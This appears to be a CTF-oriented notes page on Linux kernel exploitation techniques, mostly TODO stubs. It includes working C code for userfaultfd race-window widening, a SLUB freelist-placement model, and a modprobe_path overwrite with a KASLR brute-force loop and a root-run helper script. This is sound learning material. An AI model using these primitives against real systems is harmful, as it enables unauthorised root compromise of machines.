This directory lists techniques used in kernel pwn.
IMPORTANT: I'm just learning kernel pwning now, and this list might have some wrong descriptions or insufficient points. If you find something wrong, or you know some technique I should know, please tell me and scold me.
THIS SECTION IS FREQUENTLY UPDATED NOW.
- TODO
- example challs: TODO
- TODO
- example challs: TODO
- Park a kernel thread in the middle of a kernel code path (typically inside the copy_from_user()/copy_to_user() of the vulnerable syscall) with userfaultfd: register the page the kernel is about to touch, and the page fault is delivered to a userland handler thread, which can do arbitrary work (free and re-allocate the object the kernel is still using, etc.) before it supplies the page and lets the kernel continue. This turns an otherwise tiny race window into a stable one. For the detailed principle, check HERE. Caveat: since Linux 5.11 unprivileged userfaultfd is disabled by default (vm.unprivileged_userfaultfd=0); an unprivileged process can only get a UFFD_USER_MODE_ONLY descriptor, which handles user-mode faults only, so a kernel-side access to the page fails with EFAULT instead of blocking.
- example challs: TODO
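An added example (not code from the original page): a minimal, self-contained version of the trick in C. The kernel-side access is stood in for by a pipe read into the registered page (pipe_read() does copy_to_user() there and faults exactly like the copy in a vulnerable syscall would); the handler thread holds the kernel for 50 ms, then supplies the page. It also exercises the 5.11+ mitigation: if the plain userfaultfd() call is refused, it falls back to UFFD_USER_MODE_ONLY and the kernel copy then returns EFAULT instead of blocking. Needs Linux; the helper names (`fault_handler`, `uffd_kernel_block_demo`) are mine.

```c
/* Added example (not from the original page): park a kernel copy_to_user()
 * on a userfaultfd-registered page and release it from a handler thread. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

#ifndef UFFD_USER_MODE_ONLY
#define UFFD_USER_MODE_ONLY 1            /* flag exists since Linux 5.11 */
#endif

static size_t g_page_sz;
static volatile int g_stop;
static int g_faults_handled;
struct handler_args { int uffd; char *page; };

/* Handler thread: the faulting context (here: the kernel inside a syscall)
 * stays parked until we resolve the fault with UFFDIO_COPY. In a real exploit
 * the "work" done in that window is freeing/re-allocating the object the
 * kernel is still working on. */
static void *fault_handler(void *arg)
{
    struct handler_args *a = arg;
    struct pollfd pfd = { .fd = a->uffd, .events = POLLIN };
    static char src[65536];
    while (!g_stop) {
        struct uffd_msg msg;
        if (poll(&pfd, 1, 100) <= 0 || read(a->uffd, &msg, sizeof msg) != sizeof msg ||
            msg.event != UFFD_EVENT_PAGEFAULT)
            continue;
        usleep(50 * 1000);                            /* the (now arbitrarily long) race window */
        memset(src, 0x41, g_page_sz);                 /* content the kernel will see afterwards */
        struct uffdio_copy cp = { .dst = (unsigned long)a->page, .src = (unsigned long)src,
                                  .len = g_page_sz, .mode = 0 };
        if (ioctl(a->uffd, UFFDIO_COPY, &cp) == 0)
            g_faults_handled++;
    }
    return NULL;
}

/* Returns 1 if the kernel's copy into the page was parked and then released by
 * the handler, 0 if only a UFFD_USER_MODE_ONLY fd was obtainable (the kernel-
 * side copy then fails with EFAULT instead of blocking), -1 if userfaultfd is
 * unavailable here at all. */
int uffd_kernel_block_demo(void)
{
    g_page_sz = (size_t)sysconf(_SC_PAGESIZE);
    if (g_page_sz > 65536) return -1;
    int kernel_faults_ok = 1;
    int uffd = (int)syscall(SYS_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd < 0) {                                   /* vm.unprivileged_userfaultfd=0 */
        kernel_faults_ok = 0;
        uffd = (int)syscall(SYS_userfaultfd, O_CLOEXEC | O_NONBLOCK | UFFD_USER_MODE_ONLY);
        if (uffd < 0) return -1;
    }
    struct uffdio_api api = { .api = UFFD_API, .features = 0 };
    char *page = mmap(NULL, g_page_sz, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    struct uffdio_register reg = { .range = { .start = (unsigned long)page, .len = g_page_sz },
                                   .mode = UFFDIO_REGISTER_MODE_MISSING };
    if (ioctl(uffd, UFFDIO_API, &api) || page == MAP_FAILED || ioctl(uffd, UFFDIO_REGISTER, &reg)) {
        if (page != MAP_FAILED) munmap(page, g_page_sz);
        close(uffd);
        return -1;
    }
    g_stop = 0; g_faults_handled = 0;
    struct handler_args a = { uffd, page };
    pthread_t th;
    if (pthread_create(&th, NULL, fault_handler, &a)) { munmap(page, g_page_sz); close(uffd); return -1; }

    /* Kernel-side access: pipe_read() does copy_to_user() into the untouched
     * page and faults there, just like the copy in a vulnerable syscall. */
    int pfd[2];
    if (pipe(pfd) || write(pfd[1], "P", 1) != 1) { g_stop = 1; pthread_join(th, NULL); return -1; }
    ssize_t n = read(pfd[0], page, 1);
    int efault = (n < 0 && errno == EFAULT);
    g_stop = 1;
    pthread_join(th, NULL);

    int result = -1;
    if (n == 1 && page[0] == 'P' && page[1] == 0x41 && g_faults_handled == 1)
        result = 1;                                   /* kernel parked, then released */
    else if (efault && !kernel_faults_ok)
        result = 0;                                   /* user-mode-only fd: mitigation hit */
    close(pfd[0]); close(pfd[1]); munmap(page, g_page_sz); close(uffd);
    return result;
}

int main(void)
{
    int r = uffd_kernel_block_demo();
    printf("%s\n", r == 1 ? "kernel copy parked and released by the handler"
                 : r == 0 ? "only user-mode faults deliverable (UFFD_USER_MODE_ONLY)"
                          : "userfaultfd unavailable");
    return 0;
}
```

On a kernel that still hands out full userfaultfd descriptors to unprivileged users (or with CAP_SYS_PTRACE, or vm.unprivileged_userfaultfd=1) the read() sits in the kernel for as long as the handler wants; with only UFFD_USER_MODE_ONLY available the same read() comes back with EFAULT at once, which is exactly why the technique stopped working out of the box on recent kernels.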
- TODO
- example challs: TODO
- TODO
- example challs: TODO
- TODO
- example challs: TODO
- NOTE: the freelist pointer inside a free SLUB object is now stored near the middle of the object (word aligned) instead of at offset 0. This was introduced by commit 3202fa62fb43087387c65bfa9c100feffac74aa6 ("slub: relocate freelist pointer to middle of object", April 2020). A small over/underflow from a neighbouring object therefore no longer reaches it; to hijack the freelist you now need a write that lands at roughly `object_size / 2` inside the freed object (a UAF write on the freed object itself still can, and with CONFIG_SLAB_FREELIST_HARDENED the stored value is additionally XORed with a per-cache secret and the slot address, so forging it needs a leak). It landed on April 1st, but it is no April Fools' joke... :(

```c
/* mm/slub.c, calculate_sizes(): placement of the freelist pointer after the patch */
} else if (freepointer_area > sizeof(void *)) {
	/*
	 * Store freelist pointer near middle of object to keep
	 * it away from the edges of the object to avoid small
	 * sized over/underflows from neighboring allocations.
	 */
	s->offset = ALIGN(freepointer_area / 2, sizeof(void *));
}
```
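An added example (not from the page or the kernel tree) that models both placements and checks what a small linear overflow from a neighbouring object actually reaches. `freeptr_offset_new()` uses the same arithmetic as the patch, assuming a plain kmalloc-style cache (no constructor, RCU, poisoning or red zone, so the usable object size is the freepointer area); the slab model is a simplification (contiguous objects, no freelist randomisation or hardening) and the function names are mine.

```c
/* Added example (not from the original page): where the SLUB freelist pointer
 * lives before/after commit 3202fa62fb43, and what a small overflow clobbers. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ALIGN(x, a) (((x) + ((a) - 1)) & ~((a) - 1))

/* Old placement (no ctor/RCU/poison): the pointer sat at offset 0. */
size_t freeptr_offset_old(size_t object_size) { (void)object_size; return 0; }

/* New placement, same arithmetic as calculate_sizes(): near the middle, word
 * aligned. Assumes freepointer_area == object_size (plain kmalloc cache). */
size_t freeptr_offset_new(size_t object_size)
{
    size_t freepointer_area = object_size;
    if (freepointer_area > sizeof(void *))
        return ALIGN(freepointer_area / 2, sizeof(void *));
    return 0;
}

#define NOBJ 4
#define MAX_OBJ 256

/* Model a slab of NOBJ contiguous objects (SLUB puts no header between them).
 * Object 0 is allocated; objects 1..NOBJ-1 are free and linked through the
 * freelist pointer stored at fp_off. Overflow `overflow_len` bytes past the end
 * of object 0 into object 1 and report whether object 1's freelist pointer was
 * clobbered (1) or survived (0); -1 on bad parameters. */
int freelist_clobbered_by_overflow(size_t obj_size, size_t fp_off, size_t overflow_len)
{
    uint8_t slab[NOBJ * MAX_OBJ];
    if (obj_size > MAX_OBJ || obj_size < sizeof(void *) ||
        fp_off + sizeof(void *) > obj_size || overflow_len > obj_size)
        return -1;
    memset(slab, 0, sizeof slab);
    for (int i = 1; i < NOBJ; i++) {                  /* obj1 -> obj2 -> obj3 -> NULL */
        uint8_t *next = (i + 1 < NOBJ) ? slab + (i + 1) * obj_size : NULL;
        memcpy(slab + i * obj_size + fp_off, &next, sizeof next);
    }
    /* Linear overflow from object 0: bytes [obj_size, obj_size + overflow_len). */
    memset(slab + obj_size, 0x41, overflow_len);
    uint8_t *fp;
    memcpy(&fp, slab + obj_size + fp_off, sizeof fp);
    return fp != slab + 2 * obj_size;
}

int main(void)
{
    size_t sizes[] = { 8, 16, 24, 64, 96, 192, 256 };
    for (size_t i = 0; i < sizeof sizes / sizeof sizes[0]; i++) {
        size_t sz = sizes[i], off_old = freeptr_offset_old(sz), off_new = freeptr_offset_new(sz);
        printf("kmalloc-%-3zu freeptr offset old=%zu new=%3zu | 8-byte overflow clobbers it: old=%d new=%d\n",
               sz, off_old, off_new,
               freelist_clobbered_by_overflow(sz, off_old, 8),
               freelist_clobbered_by_overflow(sz, off_new, 8));
    }
    return 0;
}
```

The point the table makes: for kmalloc-64 the pointer moved from offset 0 to 32, so an 8-byte off-by-a-word overflow that used to rewrite the next-free pointer now only hits payload bytes, and you need at least 40 bytes of overflow (or a write primitive that starts inside the freed object) to reach it.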
- TODO
- example challs: TODO
- Overwrite `modprobe_path` with the path of your own shell script, then execve() a file with an unknown binary format (e.g. one whose first four bytes are 0xff 0xff 0xff 0xff: the kernel only calls request_module("binfmt-%04x") when no binfmt handler accepted the file and those bytes are not all printable). The kernel then runs `modprobe_path` as root through call_usermodehelper(), so your script runs as root. For the detailed principle, check HERE. Requires CONFIG_MODULES=y and CONFIG_STATIC_USERMODEHELPER=n (otherwise the path is not writable).
- You can/might use this technique WITHOUT ANY LEAK: with KASLR on x86_64 the kernel text base is randomised in 2 MiB steps inside a 1 GiB window, so only about 9 bits of the address of `modprobe_path` are unknown (just over one byte, at most 512 candidates). If you have an arbitrary address write (AAW) you can brute-force them, provided the primitive survives the wrong guesses (a stray kernel write to an unmapped address oopses, which with panic_on_oops takes the box down).
- example chall: pprofile from LINE CTF 2021
- example challs: TODO
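As an added example (not code from the original page), the userland half of this technique in C: the KASLR candidate enumeration for the no-leak variant, the same printable-header check the kernel makes before calling request_module(), the helper script and trigger file, and the overwrite loop driven by an arbitrary-write primitive. The `aaw_fn` signature, the modprobe_path offset `SIM_MODPROBE_OFF`, the slot `SIM_SLOT` and `sim_aaw` are assumptions/simulation so the block runs without a kernel bug; in a real exploit you plug in the challenge's primitive and the offset of `modprobe_path` taken from the kernel's System.map or vmlinux.

```c
/* Added example (not from the original page): userland side of the
 * modprobe_path technique, with a simulated AAW so it runs stand-alone. */
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* x86_64 KASLR (CONFIG_RANDOMIZE_BASE): the text base starts at __START_KERNEL and
 * moves in CONFIG_PHYSICAL_ALIGN (2 MiB) steps inside the 1 GiB KERNEL_IMAGE_SIZE
 * window, so only the slot index (~9 bits, 504 slots) is unknown. */
#define KASLR_BASE_MIN   0xffffffff81000000UL
#define KASLR_STEP       0x200000UL
#define KASLR_WINDOW_END 0xffffffffc0000000UL

size_t kaslr_candidate_count(void) { return (KASLR_WINDOW_END - KASLR_BASE_MIN) / KASLR_STEP; }
unsigned long kaslr_candidate(size_t slot, unsigned long sym_off)
{
    return KASLR_BASE_MIN + slot * KASLR_STEP + sym_off;
}

/* Mirrors fs/exec.c search_binary_handler(): once no binfmt accepted the file,
 * request_module("binfmt-%04x") is issued only if the first four bytes are not
 * all printable, so a text file or "#!..." never reaches modprobe. */
#define printable(c) (((c) == '\t') || ((c) == '\n') || (0x20 <= (c) && (c) <= 0x7e))
int header_triggers_modprobe(const unsigned char *h)
{
    return !(printable(h[0]) && printable(h[1]) && printable(h[2]) && printable(h[3]));
}

static int write_file(const char *path, const void *buf, size_t len, mode_t mode)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, mode);
    if (fd < 0) return -1;
    int ok = write(fd, buf, len) == (ssize_t)len;
    close(fd);
    return ok ? 0 : -1;
}

/* Drop the helper the kernel will run as root, and the unknown-format trigger. */
int prepare_modprobe_payload(const char *script_path, const char *trigger_path,
                             const char *flag_src, const char *flag_dst)
{
    char script[256];
    snprintf(script, sizeof script, "#!/bin/sh\ncp %s %s\nchmod 666 %s\n", flag_src, flag_dst, flag_dst);
    static const unsigned char trigger[4] = { 0xff, 0xff, 0xff, 0xff };
    if (!header_triggers_modprobe(trigger)) return -1;
    if (write_file(script_path, script, strlen(script), 0755)) return -1;
    return write_file(trigger_path, trigger, sizeof trigger, 0755);
}

/* The challenge's arbitrary-write primitive (hypothetical signature):
 * 0 on success, -1 if the write faulted or was rejected. */
typedef int (*aaw_fn)(unsigned long kaddr, const void *data, size_t len);

/* Overwrite modprobe_path. known_base == 0 means "no leak": try every KASLR slot
 * (viable only if a wrong guess does not take the kernel down). Returns how many
 * writes the primitive reported as successful. */
int overwrite_modprobe_path(aaw_fn aaw, unsigned long known_base,
                            unsigned long modprobe_path_off, const char *script_path)
{
    size_t slots = known_base ? 1 : kaslr_candidate_count();
    int hits = 0;
    for (size_t i = 0; i < slots; i++) {
        unsigned long addr = known_base ? known_base + modprobe_path_off
                                        : kaslr_candidate(i, modprobe_path_off);
        if (aaw(addr, script_path, strlen(script_path) + 1) == 0)
            hits++;
    }
    return hits;
}

/* execve() the trigger: no binfmt claims it, so the kernel spawns modprobe_path
 * (now our script) as root through call_usermodehelper(). */
int fire_trigger(const char *trigger_path)
{
    pid_t pid = fork();
    if (pid == 0) { execl(trigger_path, trigger_path, (char *)NULL); _exit(127); }
    int st = 0;
    waitpid(pid, &st, 0);
    return WIFEXITED(st) ? WEXITSTATUS(st) : -1;
}

/* --- simulation with made-up numbers so the block runs without a kernel bug --- */
#define SIM_MODPROBE_OFF 0x1234560UL             /* hypothetical offset of modprobe_path */
#define SIM_SLOT 17                              /* the "random" KASLR slot this boot */
char sim_modprobe_path[64] = "/sbin/modprobe";   /* stand-in for kernel memory */

int sim_aaw(unsigned long kaddr, const void *data, size_t len)
{
    if (kaddr != kaslr_candidate(SIM_SLOT, SIM_MODPROBE_OFF) || len > sizeof sim_modprobe_path)
        return -1;                               /* wrong guess: the write "faults" */
    memcpy(sim_modprobe_path, data, len);
    return 0;
}
```

Usage against a real target is `prepare_modprobe_payload("/tmp/w", "/tmp/dummy", "/flag", "/tmp/flag")`, then `overwrite_modprobe_path(real_aaw, leaked_base_or_0, modprobe_path_off, "/tmp/w")`, then `fire_trigger("/tmp/dummy")`; the execve itself fails with ENOEXEC, but by then the kernel has already run the script as root. With the simulation, the no-leak call walks all 504 slots and exactly one write "lands".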
- TODO
- example challs: TODO
- TODO
- example challs: TODO
- TODO
- TODO
- TODO
- TODO
- TODO
- example challs: TODO
- TODO
- example challs: TODO
- TODO
- example challs: TODO
- TODO
- example challs: TODO
- TODO
- example challs: TODO